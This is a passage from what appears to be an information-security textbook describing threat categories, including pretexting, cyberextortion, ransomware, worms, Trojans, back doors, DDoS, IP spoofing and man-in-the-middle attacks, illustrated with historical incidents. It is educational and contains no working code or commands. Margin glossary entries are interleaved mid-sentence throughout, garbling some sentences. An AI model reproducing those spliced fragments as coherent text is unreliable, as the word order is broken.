be an authority figure who needs pretends to be an authority figure to gain access to private or confidential informa-
information to confirm the target’s
tion, such as health, employment, or financial records. The attacker may impersonate
identity, but the real object is to
trick the target into revealing con- someone who is known to the potential victim only by reputation. If your telephone
fidential information; commonly rings and the caller ID feature shows the name of your bank, you might be more likely
performed by telephone. to reveal your account number. Likewise, if your phone displays the name of your
doctor, you may be more inclined to reveal personal information than you might
information extortion otherwise. Be careful; VOIP phone services have made it easy to spoof caller ID, and
The act of an attacker or trusted you can never be sure who you are talking to. Pretexting is generally considered
insider who steals or interrupts pretending to be a person you are not, whereas phishing is pretending to represent
access to information from a
computer system and demands an organization via a Web site or HTML e-mail. This can be a blurry distinction.
compensation for its return or for
an agreement not to disclose the
information. Information Extortion
Information extortion , also known as cyberextortion, is common in the theft of
cyberextortion credit card numbers. For example, the Web-based retailer CD Universe was vic-
See information extortion. timized by a theft of data files that contained customer credit card information.
Source: Internal Revenue Service (IRS).
Figure 2-12 IRS phishing and online scams reporting Web site
The culprit was a Russian hacker named Maxus who hacked the online vendor and stole several hundred thou-
sand credit card numbers. When the company refused to pay the $100,000 blackmail, he posted the card num-
bers to a Web site, offering them to the criminal community. His Web site became so popular he had to restrict
access.29
Another incident of extortion occurred in 2008 when pharmacy benefits manager Express Scripts, Inc., fell victim
to a hacker who demonstrated that he had access to 75 customer records and claimed to have access to millions more.
The perpetrator demanded an undisclosed amount of money. The company notified the FBI and offered a $1 million
reward for the arrest of the perpetrator. Express Scripts notified the affected customers, as required by various state
laws. The company was obliged to pay undisclosed expenses for the notifications and was required to buy credit
monitoring services for its customers in some states.30
In 2010, Anthony Digati allegedly threatened to conduct a spam attack on the insurance company New York Life.
He reportedly sent dozens of e-mails to company executives threatening to conduct a negative image campaign by
sending more than six million e-mails to people throughout the country. He then demanded approximately $200,000
to stop the attack, and next threatened to increase the demand to more than $3 million if the company ignored him.
His arrest thwarted the spam attack.31
In 2012, a programmer from Walachi Innovation Technologies allegedly broke into the organization’s systems and
changed the access passwords and codes, locking legitimate users out of the system. He then reportedly demanded
$300,000 in exchange for the new codes. A court order eventually forced him to surrender the information to the
organization. In Russia, a talented hacker created malware that installed inappropriate materials on an unsuspecting
user’s system, along with a banner threatening to notify the authorities if a bribe was not paid. At 500 rubles (about
$17), victims in Russia and other countries were more willing to pay the bribe than risk prosecution by less consider-
ate law enforcement.32
Ransomware
The latest type of attack in this category is known as ransomware . Ransomware is a malware attack on the host
system that denies access to the user and then offers to provide a key to allow access back to the user’s system
and data for a fee. There are two types of ransomware: lockscreen and encryption. Lockscreen ransomware denies
access to the user’s system simply by disabling access to the desktop and preventing the user from bypassing
the ransom screen that demands payment. Encryption ransomware is far worse, in that it encrypts some or all of
a user’s hard drive and then demands payment. (See Figure 2-13.) Common phishing mechanisms to get a user to
download ransomware include pop-ups indicating that illegal information or malware was detected on the user’s
system, threatening to notify law enforcement, or offering to delete the offending material if the user clicks a link
or button.
In 2013, a virus named CryptoLocker made the headlines as one of the first examples of this new type of malware.
More than $100 million in losses were attributed to this ransomware before U.S. federal agents, working with law
enforcement from other countries, identified the culprits and seized their systems. The hackers behind CryptoLocker
also ran Gameover Zeus Botnet, a server farm that used other hackers to spread the malware. The leader of the hacker
group was the Russian hacker Evgeniy Mikhailovich Bogachev, a.k.a. Slavik, who is still at large and still listed on the
FBI’s Cyber Most Wanted.33
In 2017, the ransomware WannaCry made the headlines as it swept through cyberspace, locking systems and
demanding payments in Bitcoin. The ransomware attack was cut short when a researcher discovered a flaw in the
attack that contained a kill switch, preventing the attack from spreading. Software
companies like Microsoft quickly issued patches that further stopped the infection. ransomware
Several governments asserted that the North Korean government was behind the Computer software specifically
attack.34 designed to identify and encrypt
valuable information in a victim’s
In 2019, the FBI’s Internet Crime Complaint Center received more than
system in order to extort payment
2,000 complaints identified as ransomware, with estimated losses of almost for the key needed to unlock the
$9 million.35 encryption.
For a list of prominent ransomware investigations and arrests, visit www.technology.org/2016/11/21/

i ransomware-authors-arrest-cases/.
Figure 2-13 Ransomware notification screen
Sabotage or Vandalism
This category of threat involves the deliberate sabotage of a computer system or business or acts of vandalism to
destroy an asset or damage the image of an organization. These acts can range from petty vandalism by employees to
organized sabotage against an organization.
Although they might not be financially devastating, attacks on the image of an organization are serious. Vandal-
ism to a Web site can erode consumer confidence, diminishing an organization’s sales, net worth, and reputation. For
example, in the early hours of July 13, 2001, a group known as Fluffi Bunni left its mark on the home page of the SysAd-
min, Audit, Network, and Security (SANS) Institute, a cooperative research and education organization. This event was
particularly embarrassing to SANS Institute management because the organization provides security instruction and
certification. The defacement read, “Would you really trust these guys to teach you security?”36 At least one member
of the group was subsequently arrested by British authorities.
Online Activism
There are innumerable reports of hackers accessing systems and damaging or destroying critical data. Hacked Web
sites once made front-page news, as the perpetrators intended. The impact of these acts has lessened as the volume
has increased. The Web site that acts as the clearinghouse for many hacking reports, attrition.org, has stopped catalog-
ing all Web site defacements because the frequency of such acts has outstripped the ability of the volunteers to keep
the site up to date.37
Compared to Web site defacement, vandalism within a network is more malicious
hacktivist in intent and less public. Today, security experts are noticing a rise in another form of
A hacker who seeks to interfere online vandalism: hacktivist or cyberactivist operations. For example, in November
with or disrupt systems to protest
the operations, policies, or actions 2009, a group calling itself “antifascist hackers” defaced the Web site of Holocaust denier
of an organization or government and Nazi sympathizer David Irving. They also released his private e-mail correspon-
agency. dence, secret locations of events on his speaking tour, and detailed information about
people attending those events, among them members of various white supremacist
cyberactivist organizations. This information was posted on the Web site WikiLeaks, an organization
See hacktivist. that publishes sensitive and classified information provided by anonymous sources.38
Leveraging online social media resources can sometimes cross over into unethical or even illegal territory. For
example, activists engage in a behavior known as doxing to locate or steal confidential and personal records and then
release them publicly to embarrass political opponents.
Figure 2-14 illustrates how Greenpeace, a well-known environmental activist organization, once used its Web pres-
ence to recruit cyberactivists.
Cyberterrorism and Cyberwarfare

A much more sinister form of activism—related to hacking—is cyberterrorism, prac- doxing
ticed by cyberterrorists. The United States and other governments are developing A practice of using online resources
to find and then disseminate com-
security measures intended to protect critical computing and communications net- promising information, perhaps
works as well as physical and power utility infrastructures. without lawful authority, with the
intent to embarrass or harm the
In the 1980s, Barry Collin, a senior research fellow at the Institute for Security reputation of an individual or orga-
and Intelligence in California, coined the term “cyberterrorism” to refer to nization. The term originates from
dox, an abbreviation of documents.
the convergence of cyberspace and terrorism. Mark Pollitt, special agent
for the FBI, offers a working definition: “Cyberterrorism is the premeditated,
politically motivated attack against information, computer systems, computer cyberterrorism
programs, and data which result in violence against noncombatant targets by The conduct of terrorist activities
via networks or Internet pathways.
subnational groups or clandestine agents.”39
Cyberterrorism has thus far been largely limited to acts such as the defacement of cyberterrorist
NATO Web pages during the war in Kosovo. Some industry observers have taken the A hacker who attacks systems to
position that cyberterrorism is not a real threat, but instead is merely hype that distracts conduct terrorist activities via net-
from more concrete and pressing information security issues that do need attention. works or Internet pathways.
Figure 2-14 Cyberactivists wanted

However, further instances of cyberterrorism have begun to surface. According to Dr. Mudawi Mukhtar Elmusharaf
at the Computer Crime Research Center, “on October 21, 2002, a distributed denial-of-service (DDoS) attack struck the
13 root servers that provide the primary road map for all Internet communications. Nine servers out of these 13 were
jammed. The problem was taken care of in a short period of time.”40 While this attack was significant, the results were
not noticeable to most users of the Internet. A news report shortly after the event noted that “the attack, at its peak,
only caused 6 percent of domain name service requests to go unanswered [… and the global] DNS system normally
responds almost 100 percent of the time.”41
Internet servers were again attacked on February 6, 2007, with four Domain Name System (DNS) servers targeted.
However, the servers managed to contain the attack. It was reported that the U.S. Department of Defense was on
standby to conduct a military counterattack if the cyberattack had succeeded.42 In 2011, China confirmed the exis-
tence of a nation-sponsored cyberterrorism organization known as the Cyber Blue Team, which is used to infiltrate
the systems of foreign governments.
Government officials are concerned that certain foreign countries are “pursuing cyberweapons the same way they
are pursuing nuclear weapons.”43 Some of these cyberterrorist attacks are aimed at disrupting government agencies,
while others seem designed to create mass havoc with civilian and commercial industry targets. However, the U.S.
government conducts its own cyberwarfare actions, having reportedly targeted overseas efforts to develop nuclear
enrichment plants by hacking into and destroying critical equipment, using the infamous Stuxnet worm to do so.44
For more information about the evolving threat of cyberwarfare, visit a leading think tank, the RAND Corpora-
i tion, to read research reports and commentary from leaders in the field (www.rand.org/topics/cyber-warfare.html).
Positive Online Activism

Not all online activism is negative. Social media outlets, such as Facebook, Twitter, and YouTube, are commonly used
to perform fund-raising, raise awareness of social issues, gather support for legitimate causes, and promote involve-
ment. Modern business organizations try to leverage social media and online activism to improve their public image
and increase awareness of socially responsible actions.
Software Attacks
cyberwarfare Deliberate software attacks occur when an individual or group designs and deploys
Formally sanctioned offensive software to attack a system. This attack can consist of specially crafted software that
operations conducted by a govern- attackers trick users into installing on their systems. This software can be used to
ment or state against information overwhelm the processing capabilities of online systems or to gain access to pro-
or systems of another government
or state; sometimes called informa- tected systems by hidden means.
tion warfare.
Malware
malware Malware , also referred to as malicious code or malicious software, includes
Computer software specifically
the viruses, worms, and other scripts and applications designed to harm a target
designed to perform malicious or computer system. Other attacks that use software, like redirect attacks and denial-
unwanted actions. of-service attacks, also fall under this threat. These software components or programs
are designed to damage, destroy, or deny service to targeted systems. Note that the
malicious code terminology used to describe malware is often not mutually exclusive; for instance,
See malware. Trojan horse malware may be delivered as a virus, a worm, or both.
Malicious code attacks include the execution of viruses, worms, Trojan horses,
malicious software and active Web scripts with the intent to destroy or steal information. The most
See malware. state-of-the-art malicious code attack is the polymorphic worm, or multivector worm.
These attack programs use up to six known attack vectors to exploit a variety of
zero-day attack vulnerabilities in common information system devices. Many successful malware
An attack that makes use of mal-
attacks are completed using techniques that are widely known; some have been in
ware that is not yet known by the use for years. When an attack makes use of malware that is not yet known by the
antimalware software companies. antimalware software companies, it is said to be a zero-day attack.
Other forms of malware include covert software applications—bots, spyware, and adware—that are designed to
work out of users’ sight or be triggered by an apparently innocuous user action. Bots are often the technology used
to implement Trojan horses, logic bombs, back doors, and spyware.45 Spyware is placed on a computer to secretly
gather information about the user and report it. One type of spyware is a Web bug, a tiny graphic that is referenced
within the Hypertext Markup Language (HTML) content of a Web page or e-mail to collect information about the user
viewing the content. Another form of spyware is a tracking cookie, which is placed on users’ computers to track their
activity on different Web sites and create a detailed profile of their behavior.46 Each of these hidden code components
can be used to collect user information that could then be used in a social engineering or identity theft attack.
For more information about current events in malware, visit the U.S. Computer Emergency Readiness Team
i (US-CERT) Web site, and go to its Current Activity page at https://us-cert.cisa.gov/ncas/current-activity. US-CERT is
part of the Department of Homeland Security.
adware
Table 2-7 draws on three surveys to list some of the malware that has had the Malware intended to provide unde-
biggest impact on computer users to date. While this table may seem out of date, the sired marketing and advertising,
values still hold up as of mid-2020. It seems that newer malware cannot break into the all- including pop-ups and banners on
a user’s screens.
time top 10, possibly because of the proliferation of malware variants and do-it-yourself
malware kits. It’s hard for any one new piece of malware to “break out” when so many
variations are in play. It seems we are entering the days of precisely targeted malware.
spyware
Any technology that aids in gath-
ering information about people
Viruses or organizations without their
A computer virus consists of code segments (programming instructions) that knowledge.
perform malicious actions. This code behaves much like a virus pathogen that
attacks animals and plants, using the cell’s own replication machinery to propa- virus
gate the attack beyond the initial target. The code attaches itself to an existing A type of malware that is attached
program and takes control of the program’s access to the targeted computer. to other executable programs and,
The virus-controlled target program then carries out the virus plan by replicat- when activated, replicates and
propagates itself to multiple sys-
ing itself into additional targeted systems. Often, users unwittingly help viruses tems, spreading by multiple com-
get into a system. Opening infected e-mail or some other seemingly trivial action munications vectors.
Table 2-7 The Most Dangerous Malware Attacks to Date47,48,49
Estimated Number
Malware Type Year of Systems Infected Estimated Financial Damage
CIH, a.k.a. Chernobyl Memory-resident virus 1998 Unknown $250 million
Melissa Macro virus 1999 Unknown $300 million to $600 million
ILOVEYOU Virus 2000 10% of Internet $5.5 billion
Klez (and variants) Virus 2001 7.2% of Internet $19.8 billion
Code Red (and CR II) Worm 2001 400,000 servers $2.6 billion
Nimda Multivector worm 2001 Unknown Unknown
Sobig F Worm 2003 1 million $3 billion
SQL Slammer, a.k.a. Worm 2003 75,000 $950 million to $1.2 billion
Sapphire
MyDoom Worm 2004 2 million $38 billion
Sasser Worm 2004 500,000 to 700,000 Unknown
Nesky Virus 2004 Less than 100,000 Unknown
Storm Worm Trojan horse virus 2006 10 million Unknown
Leap-A/Oompa-A Virus 2006 Unknown (Apple) Unknown
Conficker Worm 2009 15 million Unknown
Stutznet Worm 2009 ~200,000 Unknown
macro virus can cause anything from random messages appearing on a user’s screen to the
A type of virus written in a spe- destruction of entire hard drives. Just as their namesakes are passed among
cific language to target applica- living bodies, computer viruses are passed from machine to machine via physi-
tions that use the language, and cal media, e-mail, or other forms of computer data transmission. When these
activated when the application’s
product is opened; typically affects viruses infect a machine, they may immediately scan it for e-mail applications
documents, slideshows, e-mails, or even send themselves to every user in the e-mail address book.
or spreadsheets created by office One of the most common methods of virus transmission is via e-mail attach-
suite applications.
ment files. Most organizations block e-mail attachments of certain types and filter
all e-mail for known viruses. Years ago, viruses were slow-moving creatures that
boot virus transferred viral payloads through the cumbersome movement of diskettes from
Also known as a boot sector virus,
system to system. Now computers are networked, and e-mail programs prove to
a type of virus that targets the boot
sector or Master Boot Record (MBR) be fertile ground for computer viruses unless suitable controls are in place. The
of a computer system’s hard drive current software marketplace has several established vendors, such as Symantec
or removable storage media. Norton AntiVirus, Kaspersky Anti-Virus, AVG AntiVirus, and McAfee VirusScan,
which provide applications to help control computer viruses. Microsoft’s Mali-
memory-resident cious Software Removal Tool is freely available to help users of Windows operat-
virus ing systems remove viruses and other types of malware. Many vendors are moving
A virus that is capable of installing
to software suites that include antivirus applications and provide other malware
itself in a computer’s operating sys-
tem, starting when the computer and nonmalware protection, such as firewall protection programs.
is activated, and residing in the Viruses can be classified by how they spread themselves. Among the most com-
system’s memory even after the
mon types of information system viruses are the macro virus, which is embedded
host application is terminated; also
known as a resident virus. in automatically executing macro code used by word processors, spreadsheets, and
database applications, and the boot virus, which infects the key operating system
non-memory-resident files in a computer’s boot sector. Viruses can also be described by how their pro-
virus gramming is stored and moved. Some are found as binary executables, including
A virus that terminates after it has .exe or .com files; as interpretable data files, such as command scripts or a specific
been activated, infected its host application’s document files; or both.
system, and replicated itself; does
Alternatively, viruses may be classified as memory-resident viruses or
not reside in an operating system
or memory after executing and is non-memory-resident viruses, depending on whether they persist in a computer
also known as a non-resident virus. system’s memory after they have been executed. Resident viruses are capable of
reactivating when the computer is booted and continuing their actions until the
system is shut down, only to restart the next time the system is booted.
In 2002, the author of the Melissa virus, David L. Smith of New Jersey, was convicted in U.S. federal court and
sentenced to 20 months in prison, a $5,000 fine, and 100 hours of community service upon release.50
For more information on computer criminals and their crimes and convictions, visit http://en.wikipedia.org and
i search on “List of Computer Criminals.”
Viruses and worms can use several attack vectors to spread copies of themselves to networked peer computers,
as illustrated in Table 2-8.
Worms
Named for the tapeworm in John Brunner’s novel The Shockwave Rider, a computer worm can continue replicating
itself until it completely fills available resources, such as memory, hard drive space, and network bandwidth. Read
the nearby feature about Robert Morris to learn how much damage a worm can cause. Code Red, Sircam, Nimda
(“admin” spelled backwards), and Klez are classic examples of a class of worms
that combine multiple modes of attack into a single package. Newer malware that
worm includes features of worms and viruses will usually contain multiple exploits that
A type of malware that is capable
can use any predefined distribution vector to programmatically distribute the
of activation and replication with-
out being attached to an existing worm. (See the description of polymorphic threats later in this section for more
program. details.)
Table 2-8 Attack Replication Vectors
Vector Description
IP scan and attack The infected system scans a range of IP addresses and service ports and targets
several vulnerabilities known to hackers or left over from previous exploits, such
as Code Red, Back Orifice, or PoizonBox.
Web browsing If the infected system has write access to any Web pages, it makes all Web
content files infectious, including .html, .asp, .cgi, and other files. Users who
browse to those pages infect their machines.
Virus Each affected machine infects common executable or script files on all
computers to which it can write, which spreads the virus code to cause further
infection.
Unprotected shares Using vulnerabilities in file systems and in the way many organizations configure
them, the infected machine copies the viral component to all locations it can
reach.
Mass mail By sending e-mail infections to addresses found in the address book, the
affected machine infects many other users, whose mail-reading programs
automatically run the virus program and infect even more systems.
Simple Network Management SNMP is used for remote management of network and computer devices. By
Protocol (SNMP) using the widely known and common passwords that were employed in early
versions of this protocol, the attacking program can gain control of the device.
Most vendors have closed these vulnerabilities with software upgrades.
Robert Morris and the Internet Worm51

In November 1988, Robert Morris, Jr. made history. He was a postgraduate student at Cornell who invented a self-prop-
agating program called a worm. He released it onto the Internet, choosing to send it from the Massachusetts Institute of
Technology (MIT) to conceal the fact that the worm was designed and created at Cornell. Morris soon discovered that the
program was reproducing itself and then infecting other machines at a much greater speed than he had envisaged. The
worm had a bug.
Many machines across the United States and the world stopped working or became unresponsive. When Morris realized
what was occurring, he reached out for help. He contacted a friend at Harvard, and they sent a message to system adminis-
trators at Harvard that described the problem and requested guidance for how to disable the worm. However, because the
networks involved were jammed from the worm infection, the message was delayed and had no effect. It was too little too
late. Morris’ worm had infected many computers, including those at academic institutions, military sites, and commercial
concerns. The estimated cost of the infection and the aftermath was estimated at roughly $200 per site.
The worm that Morris created took advantage of flaws in the sendmail program. These widely known faults allowed
debug features to be exploited, but few organizations had taken the trouble to update or patch the flaws. Staff at the Univer-
sity of California, Berkeley and MIT had copies of the program and reverse-engineered them to determine how it functioned.
After working nonstop for about 12 hours, the teams of programmers devised a method to slow down the infection. Another
method was discovered at Purdue University and widely published. Ironically, the response was hampered by the clogged
state of the e-mail infrastructure caused by the worm. After a few days, things slowly started to regain normalcy, and every-
one wondered where the worm had originated. Morris was identified as its author in an article in the New York Times, even
though his identity was not confirmed at that time.
Morris was convicted under the Computer Fraud and Abuse Act and sentenced to a fine, probation, community service,
and court costs. His appeal was rejected in March 1991.
Even though it happened long ago, the outbreak of Nimda in September 2001 still serves as an example of how
quickly and widely malware can spread. It used five of the six vectors shown in Table 2-8 to spread itself with startling
speed. TruSecure Corporation, an industry source for information security statistics and solutions, reported that
Nimda spread across the Internet address space of 14 countries in less than 25 minutes.52
The Klez worm delivered a double-barreled payload: It had an attachment that contained the worm, and if the
e-mail was viewed on an HTML-enabled browser, it attempted to deliver a macro virus. News-making attacks, such as
MyDoom and Netsky, are variants of the multifaceted attack worms and viruses that exploit weaknesses in leading
operating systems and applications.
The complex behavior of worms can be initiated with or without the user downloading or executing the file.
Once the worm has infected a computer, it can redistribute itself to all e-mail addresses found on the infected system.
Furthermore, a worm can deposit copies of itself onto all Web servers that the infected system can reach; users who
subsequently visit those sites become infected. Worms also take advantage of open shares found on the network in
which an infected system is located. The worms place working copies of their code onto the server so that users of
the open shares are likely to become infected.
In 2003, Jeffrey Lee Parson, an 18-year-old high school student from Minnesota, was arrested for creating and distribut-
ing a variant of the Blaster worm called W32.Blaster-B. He was sentenced to 18 months in prison, three years of supervised
release, and 100 hours of community service.53 The original Blaster worm was reportedly created by a Chinese hacker group.
Trojan horses are frequently disguised as helpful, interesting, or necessary pieces of software, such as the readme.
exe files often included with shareware or freeware packages. Like their namesake in Greek legend, once Trojan horses are
brought into a system, they become activated and can wreak havoc on the unsuspecting user. Figure 2-15 outlines a typi-
cal Trojan horse attack. Around January 20, 1999, Internet e-mail users began receiving messages with an attachment of a
Trojan horse program named Happy99.exe. When the e-mail attachment was opened,
Trojan horse a brief multimedia program displayed fireworks and the message “Happy 1999.” While
A malware program that hides its the fireworks display was running, the Trojan horse program was installing itself into
true nature and reveals its designed the user’s system. The program continued to propagate itself by following up every
behavior only when activated.
e-mail the user sent with a second e-mail to the same recipient and with the same attack
program attached. A newer variant of the Trojan horse is an attack known as SMiShing,
polymorphic threat in which the victim is tricked into downloading malware onto a mobile phone via a text
Malware that over time changes the message. SMiShing is an abbreviation for SMS phishing.
way it appears to antivirus software
One of the biggest challenges to fighting viruses and worms has been the emergence
programs, making it undetectable
by techniques that look for precon- of polymorphic threats. A polymorphic threat actually evolves, changing its size and
figured signatures. other external file characteristics to elude detection by antivirus software programs.
Trojan horse releases its payload, monitors

computer activity, installs back door, or
transmits information to hacker
Trojan horse arrives via e-mail

or software such as free games
Trojan horse is activated when the software or
attachment is executed
Figure 2-15 Trojan horse attacks

As frustrating as viruses and worms are, perhaps more time and money are spent malware hoax
resolving malware hoaxes. Well-meaning people can disrupt the harmony and flow A message that reports the pres-
of an organization when they send group e-mails warning of supposedly dangerous ence of nonexistent malware and
wastes valuable time as employees
viruses that don’t exist. When people fail to follow virus-reporting procedures in
share the message.
response to a hoax, the network becomes overloaded and users waste time and
energy forwarding the warning message to everyone they know, posting the message
back door
on bulletin boards, and trying to update their antivirus protection software. Some
A malware payload that provides
hoaxes are the chain letters or chain e-mails of the day, which are designed to annoy access to a system by bypassing
or bemuse the reader. They are known as “weapons of mass distraction.” One of the normal access controls or an inten-
most prominent virus hoaxes was the 1994 “Goodtimes virus,” which reportedly was tional access control bypass left
by a system designer to facilitate
transmitted in an e-mail with the header “Good Times” or “goodtimes.” The virus
54
development.
never existed, and thousands of hours of employee time were wasted retransmitting
the e-mail, effectively creating a denial of service.
trap door
At one time, hoaxes amounted to little more than pranks, although occasionally
See back door.
a sting was attached. For example, the Teddy Bear hoax tricked users into deleting
necessary operating system files, which made their systems stop working. Recently,
criminals have been able to monetize the hoax virus by claiming that systems are infected with malware and then
selling a cure for a problem that does not exist. The perpetrator of the hoax may then offer to sell a fake antivirus
program to correct the fake malware.
Several Internet resources enable people to research viruses and determine if they are fact or fiction.
For the latest information on virus hoaxes, download the article “Virus Hoaxes—Are They Just a Nuisance?” from
i www.sans.org/reading-room/whitepapers/malicious/paper/30.
For a more entertaining approach to the latest virus, worm, and hoax information, visit the Hoax-Slayer Web site
at www.hoax-slayer.com.
Back Doors maintenance hook

Using a known or newly discovered access mechanism, an attacker can gain access See back door.
to a system or network resource through a back door. Viruses and worms can have
a payload that installs a back door or trap door component in a system, allowing denial-of-service (DoS)
the attacker to access the system at will with special privileges. Examples of such attack
payloads include Subseven and Back Orifice. An attack that attempts to over-
Sometimes these doors are left behind by system designers or maintenance staff; whelm a computer target’s ability to
such a door is referred to as a maintenance hook.55 More often, attackers place a handle incoming communications,
prohibiting legitimate users from
back door into a system or network they have compromised, making their return to accessing those systems.
the system that much easier the next time. A trap door is hard to detect because the
person or program that places it often makes the access exempt from the system’s
distributed denial-of-
usual audit logging features and makes every attempt to keep the back door hidden
service (DDoS) attack
from the system’s legitimate owners.
A form of attack in which a coor-
dinated stream of requests is
Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) launched against a target from
Attacks multiple locations at the same time
using bots or zombies.
In a denial-of-service (DoS) attack, the attacker sends a large number of connection
or information requests to a target (see Figure 2-16). So many requests are made that
the target system becomes overloaded and cannot respond to legitimate requests bot
for service. The system may crash or simply become unable to perform ordinary An abbreviation of robot, an auto-
mated software program that
functions. In a distributed denial-of-service (DDoS) attack, a coordinated stream executes certain commands when
of requests is launched against a target from many locations at the same time. Most it receives a specific input; also
DDoS attacks are preceded by a preparation phase in which many systems, perhaps known as a zombie.
thousands, are compromised. The compromised machines are turned into bots or
zombies, machines that are directed remotely by the attacker (usually via a transmit- zombie
ted command) to participate in the attack. DDoS attacks are more difficult to defend See bot.
against, and currently there are no controls that any single organization can apply. There are, however, some coopera-
tive efforts to enable DDoS defenses among groups of service providers; an example is the “Consensus Roadmap for
Defeating Distributed Denial of Service Attacks.”56 To use a popular metaphor, DDoS is considered a weapon of mass
destruction on the Internet. The MyDoom worm attack in February 2004 was intended to be a DDoS attack against www.
sco.com, the Web site of a vendor for a UNIX operating system. Allegedly, the attack was payback for the SCO Group’s
perceived hostility toward the open-source Linux community.57
Any system connected to the Internet and providing TCP-based network services (such as a Web server, FTP
server, or mail server) is vulnerable to DoS attacks. DoS attacks can also be launched against routers or other network
server systems if these hosts enable other TCP services, such as echo.
Prominent in the history of notable DoS attacks are those conducted by Michael Calce (a.k.a. Mafiaboy) on Amazon.
com, CNN.com, ETrade.com, ebay.com, Yahoo.com, Excite.com, and Dell.com in February 2000. These software-based
attacks lasted approximately four hours and reportedly resulted in millions of dollars in lost revenue.58 The British ISP
CloudNine is believed to be the first business “hacked out of existence” by a DoS attack in January 2002. This attack was
similar to the DoS attacks launched by Mafiaboy.59 In January 2016, a group calling itself New World Hacking attacked
the BBC’s Web site. If the scope of the attack is verified, it would qualify as the largest DDoS attack in history, with an
attack rate of 602 Gbps (gigabits per second). The group also hit Donald Trump’s campaign Web site on the same day.60
In October 2016, a massive DDoS attack took down several Web sites, including Airbnb, Etsy, Github, Netflix, Reddit,
Spotify, Twitter, and Vox, by attacking their common DNS service provider. While the initial attack only lasted hours,
the sites experienced issues for the rest of the day.61
E-Mail Attacks
While many consider spam a trivial nuisance rather than an attack, it has been used as a means of enhancing mali-
cious code attacks. In March 2002, there were reports of malicious code embedded in MP3 files that were included as
attachments to spam.62 The most significant consequence of spam, however, is the
spam waste of computer and human resources. Many organizations attempt to cope with
Undesired e-mail, typically com-
the flood of spam by using e-mail filtering technologies. Other organizations simply
mercial advertising transmitted in
bulk. tell users of the mail system to delete unwanted messages.
A form of e-mail attack that is also a DoS attack is called a mail bomb. It can
mail bomb be accomplished using traditional e-mailing techniques or by exploiting various
technical flaws in the Simple Mail Transport Protocol (SMTP). The target of the
An attack designed to overwhelm
the receiver with excessive attack receives an unmanageably large volume of unsolicited e-mail. By sending
quantities of e-mail. large e-mails with forged header information, attackers can take advantage of poorly
In a denial-of-service attack, a hacker compromises a system and uses that
system to attack the target computer, flooding it with more requests for
services than the target can handle.
In a distributed denial-of-service attack, dozens or even hundreds of computers

(known as zombies or bots) are compromised, loaded with DoS attack software,
and then remotely activated by the hacker to conduct a coordinated attack.
Figure 2-16 Denial-of-service attacks

configured e-mail systems on the Internet and trick them into sending many e-mails to an address of the attackers’
choice. If many such systems are tricked into participating, the target e-mail address is buried under thousands or
even millions of unwanted e-mails.
Although phishing attacks occur via e-mail, they are much more commonly associated with a method of social engi-
neering designed to trick users to perform an action, rather than simply making the user a target of a DoS e-mail attack.
Communications Interception Attacks

Common software-based communications attacks include several subcategories designed to intercept and collect infor-
mation in transit. These types of attacks include sniffers, spoofing, pharming, and man-in-the-middle attacks. The emer-
gence of the Internet of Things (IoT)—the addition of communications and interactivity to everyday objects—increases
the possibility of these types of attacks. Our automobiles, appliances, and entertain-
ment devices have joined our smartphones in being interconnected and remotely packet sniffer
controlled. The security of these devices has not always been a primary concern. IoT A software program or hardware
devices are now integrated intimately into our everyday lives and are proving to be appliance that can intercept, copy,
and interpret network traffic.
difficult to secure, because they are often difficult or impossible to update and may
not allow embedded passwords to be changed. The use of IoT devices poses signifi-
cant privacy risks when they cannot be properly secured. sniffer
A packet sniffer (or simply sniffer) can monitor data traveling over a network. See packet sniffer.
Sniffers can be used both for legitimate network management functions and for steal-
ing information. Unauthorized sniffers can be extremely dangerous to a network’s spoofing
security because they are virtually impossible to detect and can be inserted almost The use of a communications iden-
tifier, such as a phone number,
anywhere. This feature makes them a favorite weapon in the hacker’s arsenal. Sniffers
network address, or e-mail address,
often work on TCP/IP networks. Sniffers add risk to network communications because that is not accurately assigned to
many systems and users send information on local networks in clear text. A sniffer the source.
program shows all the data going by, including passwords, the data inside files (such
as word-processing documents), and sensitive data from applications.
IP spoofing
Attackers want to mask their sources, so they frequently use some sort of
A technique for gaining unauthor-
spoofing to hide themselves. In IP spoofing, hackers use a variety of techniques ized access to computers using
to obtain trusted IP addresses and then modify packet headers (see Figure 2-17) to a forged or modified source IP
insert these forged addresses. Newer routers and firewall arrangements can offer address to give the perception
that messages are coming from a
protection against IP spoofing. trusted host.
IP source: IP destination: Original IP packet

Data: Payload
192.168.0.25 10.0.0.75 from hacker's system
IP source: IP destination: Spoofed (modified)

Data: Payload
10.0.0.80 10.0.0.75 IP packet
IP source: IP destination: IP source: IP destination:

Data: Payload Data: Payload
10.0.0.80 10.0.0.75 10.0.0.80 10.0.0.75
Hacker modifies source address Firewall allows packet in, Spoofed packet
to spoof firewall mistaking it for legitimate traffic slips into intranet
to wreak havoc
Figure 2-17 IP spoofing attack
pharming Pharming attacks often use Trojans, worms, or other virus technologies to attack
The redirection of legitimate user an Internet browser’s address bar so that the valid URL the user types is modified to be
Web traffic to illegitimate Web sites that of an illegitimate Web site. A form of pharming called Domain Name System (DNS)
with the intent to collect personal
cache poisoning targets the Internet DNS system, corrupting legitimate data tables.
information.
The key difference between pharming and phishing is that the latter requires the user
to actively click a link or button to redirect to the illegitimate site, whereas pharming
Domain Name System
(DNS) cache poisoning attacks modify the user’s traffic without the user’s knowledge or active participation.
The intentional hacking and modi-
In the well-known man-in-the-middle attack, an attacker monitors (or sniffs)
fication of a DNS database to redi- packets from the network, modifies them, and inserts them back into the network. In
rect legitimate traffic to illegitimate a TCP hijacking attack, also known as session hijacking, the attacker uses address
Internet locations; also known as
spoofing to impersonate other legitimate entities on the network. It allows the
DNS spoofing.
attacker to eavesdrop as well as to change, delete, reroute, add, forge, or divert data.
A variant of TCP hijacking involves the interception of an encryption key exchange,
man-in-the-middle
which enables the hacker to act as an invisible man in the middle—that is, an eaves-
A group of attacks whereby a per-
son intercepts a communications dropper—on encrypted communications. Figure 2-18 illustrates these attacks by
stream and inserts himself in the showing how a hacker uses public and private encryption keys to intercept mes-
conversation to convince each of sages. You will learn more about encryption keys in Module 10.
the legitimate parties that he is
the other communications part-
ner; some of these attacks involve
encryption functions.
Technical Hardware Failures or Errors
Technical hardware failures or errors occur when a manufacturer distributes equip-
TCP hijacking ment containing a known or unknown flaw. These defects can cause the system to
A form of man-in-the-middle
perform outside of expected parameters, resulting in unreliable service or lack of
attack whereby the attacker availability. Some errors are terminal—that is, they result in the unrecoverable loss
inserts himself into TCP/IP-based of the equipment. Some errors are intermittent in that they only manifest them-
communications.
